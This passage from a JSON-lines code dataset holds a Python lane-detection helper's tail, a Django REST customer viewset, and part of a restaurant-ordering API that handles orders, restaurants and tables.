1, fontColor, 2,\n                cv2.LINE_AA)\n    cv2.putText(result, 'Vehicle position : %.2f m %s of center compared to %s' % (abs(line_base_pos), 'left' if line_base_pos < 0 else 'right', str(line_base_pos_current)), (50, 80),\n                font, 1, fontColor, 2, cv2.LINE_AA)\n    if straightAway:\n        cv2.putText(result, 'Straight Lanes Detected', (50, 100), font, 1, fontColor, 2, cv2.LINE_AA)\n\n    return result\n\ndef get_vehicle_position(image, left_fitx, right_fitx, xm_per_pix):\n    # determine vehicle position\n    vehicle_pos = image.shape[1] // 2\n    middle = (left_fitx[-1] + right_fitx[-1]) // 2\n    line_base_pos = (vehicle_pos - middle) * xm_per_pix\n\n    return line_base_pos\n\n\n", "sub_path": "Helper_Functions.py", "file_name": "Helper_Functions.py", "file_ext": "py", "file_size_in_byte": 26825, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.mgrid", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.calibrateCamera", "line_number": 37, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.undistort", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.undistort", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 75, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.drawChessboardCorners", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 94, "usage_type": "call"}, 
{"api_name": "cv2.getPerspectiveTransform", "line_number": 98, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 100, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.absolute", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.Sobel", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.absolute", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.Sobel", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 130, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 130, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 132, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 132, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 133, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 133, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 147, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 149, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 149, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 151, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 152, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 152, "usage_type": "attribute"}, {"api_name": "numpy.arctan2", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 156, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 164, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2HLS", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 187, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 210, "usage_type": "call"}, 
{"api_name": "numpy.argmax", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 225, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 233, "usage_type": "attribute"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 238, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 271, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 293, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 336, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 337, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 359, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 371, 
"usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 372, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 375, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 375, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 376, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 378, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 378, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 379, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 379, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 380, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 380, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 381, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 381, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 382, "usage_type": "name"}, {"api_name": "numpy.dstack", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 398, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 401, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 402, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 403, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 408, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 416, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 422, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 425, 
"usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 464, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 465, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 477, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 477, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 478, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 479, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 479, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 479, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 480, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 481, "usage_type": "attribute"}, {"api_name": "cv2.addWeighted", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 486, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 486, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 486, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 493, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 505, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 507, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 516, "usage_type": "attribute"}, {"api_name": "numpy.dstack", "line_number": 517, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 522, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 525, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 525, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 528, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 530, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 531, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 531, "usage_type": "name"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 534, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 538, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 538, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 539, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 540, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 541, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 542, "usage_type": 
"attribute"}, {"api_name": "cv2.putText", "line_number": 544, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 544, "usage_type": "attribute"}]} +{"seq_id": "509688631", "text": "from rest_framework import filters, mixins, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAdminUser\nfrom sreps.api.v1.serializers.customer import CustomerSerializer\nfrom sreps.api.v1.serializers.invoice import InvoiceListSerializer\nfrom sreps.core.models import Customer, Invoice\n\n\nclass CustomerViewSet(\n mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.GenericViewSet,):\n\n queryset = Customer.objects.all()\n serializer_class = CustomerSerializer\n permission_classes = (IsAdminUser,)\n\n @action(detail=True, methods=['GET'], name='Customer invoices')\n def invoices(self, request, pk=None):\n \"\"\"Get invoices made by a customer.\"\"\"\n\n customer = get_object_or_404(self.queryset, pk=pk)\n\n invoices = Invoice.objects.filter(\n customer=customer).order_by('-datetime_created')\n serializer = InvoiceListSerializer(invoices, many=True)\n\n return Response(serializer.data)\n", "sub_path": "sreps/api/v1/views/customer.py", "file_name": "customer.py", "file_ext": "py", "file_size_in_byte": 1105, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 12, "usage_type": "name"}, {"api_name": "rest_framework.mixins.UpdateModelMixin", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.mixins.DestroyModelMixin", "line_number": 14, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 14, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 15, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 15, "usage_type": "name"}, {"api_name": "sreps.core.models.Customer.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "sreps.core.models.Customer.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sreps.core.models.Customer", "line_number": 17, "usage_type": "name"}, {"api_name": "sreps.api.v1.serializers.customer.CustomerSerializer", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 19, "usage_type": "name"}, {"api_name": "sreps.core.models.Invoice.objects.filter", "line_number": 27, "usage_type": "call"}, {"api_name": "sreps.core.models.Invoice.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "sreps.core.models.Invoice", "line_number": 27, "usage_type": "name"}, {"api_name": "sreps.api.v1.serializers.invoice.InvoiceListSerializer", "line_number": 29, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 21, "usage_type": "call"}]} +{"seq_id": 
"89568133", "text": "from django.contrib.auth.hashers import check_password\nfrom rest_framework import viewsets, status, mixins\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.utils import json\nfrom django.forms.models import model_to_dict\nfrom django.db.models import ObjectDoesNotExist\nimport logging\nfrom ServeUp.Views.helper import *\n\nclass NarociloViewSet(viewsets.ModelViewSet):\n \"\"\"\n ViewSet provides 'list', 'create', 'retrieve', 'update' and 'destroy' actions\n\n Additional actions can be added using '@action()' decorator, default response\n is GET, you can add POST using 'methods' argument\n \"\"\"\n queryset = Narocilo.objects.all()\n serializer_class = NarociloSerializer\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n Returns all orders for restaurant with specified id in GET parameter 'id_restavracija'.\n\n ORDER_NEW = 0 # \"Nova Naročila\"\n ORDER_PREPARING = 1 # \"V Pripravi\"\n ORDER_DONE = 2 # \"Pripravljeno\"\n ORDER_FINISHED = 3 # \"Končano\"\n \"\"\"\n get_params = request.query_params\n response = {}\n return_data = {}\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Missing id, add ?id_restavracija=x to call\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n data = JediNarocilaPodatki.objects.filter(id_restavracija=id_restavracija,\n status__in=[ORDER_NEW, ORDER_DONE, ORDER_PREPARING, ORDER_FINISHED])\n data = JediNarocilaPodatkiSerializer(data, many=True).data\n\n for order in data:\n id_narocila = order['id_narocila']\n if id_narocila not in return_data:\n return_data[id_narocila] = {\n 'cas_prevzema': order['cas_prevzema'],\n 'cas_narocila': order['cas_narocila'],\n 'id_restavracija': order['id_restavracija'],\n 'id_uporabnik': order['id_uporabnik'],\n 'cena': 0,\n 'id_narocila': order['id_narocila'],\n 'status': order['status'],\n 'checked_in': order['checked_in'],\n 'id_miza': order['id_miza'],\n 'jedi': []\n }\n\n return_data[id_narocila]['jedi'].append({\n 'id_jed': order['id_jed'],\n 'ime_jedi': order['ime_jedi'],\n 'kolicina': order['kolicina'],\n 'cena': order['cena']\n })\n return_data[id_narocila]['cena'] += order['cena']\n\n response['status'] = 1\n response['data'] = list(return_data.values())\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['GET'])\n def refresh(self, request):\n \"\"\"\n Returns new and cancelled orders for a restaurant\n GET params:\n id_restavracija: id of the restaurant to refresh orders\n \"\"\"\n get_params = request.query_params\n response = {}\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Missing id, add ?id_restavracija=x to call\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n new, cancelled, checked_in = get_new_cancelled_checked_in_orders(int(id_restavracija))\n response['status'] = 1\n response['new_orders'] = new\n response['cancelled_orders'] = cancelled\n response['checked_in_orders'] = checked_in\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def cancel_order(self, request):\n \"\"\"\n Receive order id and delete that order from the database effectively cancelling it.\n Add the order id to the cancelled orders list\n Return conformation of action or error.\n \"\"\"\n response = {}\n data = json.load(request)\n try:\n order_id = 
data['id_narocilo']\n except KeyError as e:\n response['status'] = 0\n response['description'] = \"Missing key data \" + str(e) + \"\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n # noinspection PyBroadException\n try:\n narocilo = Narocilo.objects.get(id_narocila=order_id)\n order = {'id_narocila': narocilo.id_narocila, 'id_restavracija': narocilo.id_restavracija.id_restavracija}\n narocilo.delete()\n add_cancelled_order(order)\n response['status'] = 1\n response['description'] = \"Successfully deleted order\"\n return Response(response, status=status.HTTP_200_OK)\n except Exception:\n response['status'] = 0\n response['description'] = \"Could not delete order {}\".format(order_id)\n return Response(response, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n @action(detail=False, methods=['POST'])\n def new_order(self, request):\n \"\"\"\n The function receives JSON data with the details of a new order and stores it.\n Return values\n status: 0 - Error, 1 - Successfully added\n description: Short description of Error or confirm desired action\n \"\"\"\n response = {}\n data = json.load(request)\n\n try:\n order = {\n \"cas_prevzema\": data['cas_prevzema'],\n \"cas_narocila\": data['cas_narocila'],\n \"id_restavracija\": data['id_restavracija'],\n \"id_uporabnik\": data['id_uporabnik'],\n \"status\": ORDER_NEW,\n \"checked_in\": False\n }\n meals = data['jedi']\n except KeyError as e:\n response['status'] = 0\n response['description'] = \"Missing key data \" + str(e) + \"\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n if len(meals) == 0: # If there are no meals in order wrong formatting\n response['status'] = 0\n response['description'] = \"No meal data\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = NarociloSerializer(data=order)\n if serializer.is_valid():\n narocilo = serializer.save()\n id_narocila = narocilo.id_narocila\n\n success, price = add_meals_to_order(meals, id_narocila)\n if not success: # Something went wrong delete order\n narocilo.delete()\n response['status'] = 0\n response['description'] = \"Could not insert meals\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n order['cena'] = price\n order['id_narocila'] = id_narocila\n order['jedi'] = meals\n add_new_order(order)\n response['status'] = 1\n response['description'] = \"New order created\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n response['status'] = 0\n response['description'] = \"Could not add new order\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n @action(detail=False, methods=['POST'])\n def status_update(self, request):\n response = {'status': \"\",\n 'description': \"\"}\n order = Narocilo.objects.get(id_narocila=request.data['id_narocilo'])\n data = model_to_dict(order)\n data[\"status\"] = request.data[\"status\"]\n\n if not 0 <= request.data[\"status\"] <= 3:\n response['status'] = 0\n response['description'] = \"Invalid status value\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = NarociloSerializer(data=data, instance=order)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"Successfully changed status\"\n return Response(response, status=status.HTTP_200_OK)\n else:\n response['status'] = 0\n response['description'] = serializer.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass RestavracijaViewSet(viewsets.ModelViewSet):\n \"\"\"\n ViewSet 
provides 'list', 'create', 'retrieve', 'update' and 'destroy' actions\n\n Additional actions can be added using '@action()' decorator, default response\n is GET, you can add POST using 'methods' argument\n \"\"\"\n queryset = Restavracija.objects.all()\n serializer_class = RestavracijaSerializer\n\n @action(detail=False, methods=['POST'])\n def home(self, request):\n \"\"\"\n The function receives JSON data with the name of a city.\n Return all restaurants in given city.\n Return values\n status: 0 - Error\n description: Short description of Error or confirm desired action\n\n If valid input return only array of restaurants, request by Urban.\n \"\"\"\n response = {}\n try:\n location = request.data['location']\n except KeyError:\n location = None\n\n if location is None:\n response['status'] = 0\n response['description'] = \"Error: Please input the location\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n else:\n response = get_restaurants(location)\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def register(self, request):\n \"\"\"\n The function receives a JSON data with the admin email, restaurant name,\n restaurant type, address and rating\n Return values\n status: 0 - Error, 1 - OK\n description: Short description of Error or confirm desired action\n additional actions: Set of actions that also had to be performed, in ex. updating address table\n \"\"\"\n response = {'status': \"\",\n 'description': \"\",\n 'additional actions': \"\"}\n\n # Get admin id\n id_admin = AdminUporabnik.objects.get(email=request.data['email']).id\n\n # Deal with address id\n requested_data = request.data['naslov'].split(', ')\n address = requested_data[0].split(' ')\n post = requested_data[1].split(' ')\n\n try:\n id_address = Naslov.objects.get(ulica=\" \".join(address[:-1]), hisna_stevilka=address[-1]).id_naslov\n except Naslov.DoesNotExist:\n naslov_data = {'ulica': \" \".join(address[:-1]),\n 'hisna_stevilka': address[-1],\n 'postna_stevilka': post[0]}\n\n # Add post to Posta table, if it doesn't exist\n try:\n Posta.objects.get(postna_stevilka=post[0])\n except Posta.DoesNotExist:\n posta_data = {'postna_stevilka': post[0], 'kraj': post[1]}\n serializer_posta = PostaSerializer(data=posta_data)\n if serializer_posta.is_valid():\n serializer_posta.save()\n response['additional actions'] += \"\\nUpdated Posta table\"\n else:\n response['status'] = 0\n response['description'] = serializer_posta.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n # Add address to Naslov table, if it doesn't exist\n serializer_naslov = NaslovSerializer(data=naslov_data)\n if serializer_naslov.is_valid():\n serializer_naslov.save()\n response['additional actions'] += \"\\nUpdated Address table\"\n else:\n response['status'] = 0\n response['description'] = serializer_naslov.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n id_address = Naslov.objects.get(ulica=\" \".join(address[:-1]), hisna_stevilka=address[-1]).id_naslov\n\n # Build JSON object\n data = {'id_admin': id_admin,\n 'ime_restavracije': request.data['ime_restavracije'],\n 'id_tip_restavracije': request.data['id_tip_restavracije'],\n 'id_naslov': id_address, 'ocena': request.data['ocena']}\n\n serializer = RestavracijaSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"Restaurant added to admin\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n 
response['status'] = 0\n response['description'] = serializer.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n @action(detail=False, methods=['GET'])\n def fetch_qr(self, request):\n \"\"\"\n Function receives id_restavracija parameter\n Returns all QR codes for a given id_restavracija\n Return values:\n status: 0 || 1\n data: JSON array with QR codes\n \"\"\"\n\n get_params = request.query_params\n response = {}\n return_data = []\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Missing id, add ?id_restavracija=x to call\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n data = Mize.objects.filter(id_restavracija=id_restavracija)\n data = MizeSerializer(data, many=True).data\n\n for obj in data:\n id_miza = obj['id_miza']\n if id_miza not in return_data:\n return_data.append(id_miza)\n\n response['status'] = 1\n response['data'] = return_data\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def add_table(self, request):\n response = {}\n data = request.data\n\n try:\n id_restavracija = data['id_restavracija']\n qr = data['qr']\n except KeyError as e:\n response['status'] = 0\n response['description'] = \"Missing key data \" + str(e) + \"\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n if not len(qr):\n response['status'] = 0\n response['description'] = \"Missing data\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n table = {\n 'id_restavracija': id_restavracija,\n 'id_miza': qr\n }\n\n serializer = MizeSerializer(data=table)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"Successfully added table to restaurant\"\n return Response(response, status=status.HTTP_200_OK)\n else:\n response['status'] = 0\n response['description'] = serializer.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass TipRestavracijeViewSet(viewsets.ModelViewSet):\n \"\"\"\n ViewSet provides 'list', 'create', 'retrieve', 'update' and 'destroy' actions\n\n Additional actions can be added using 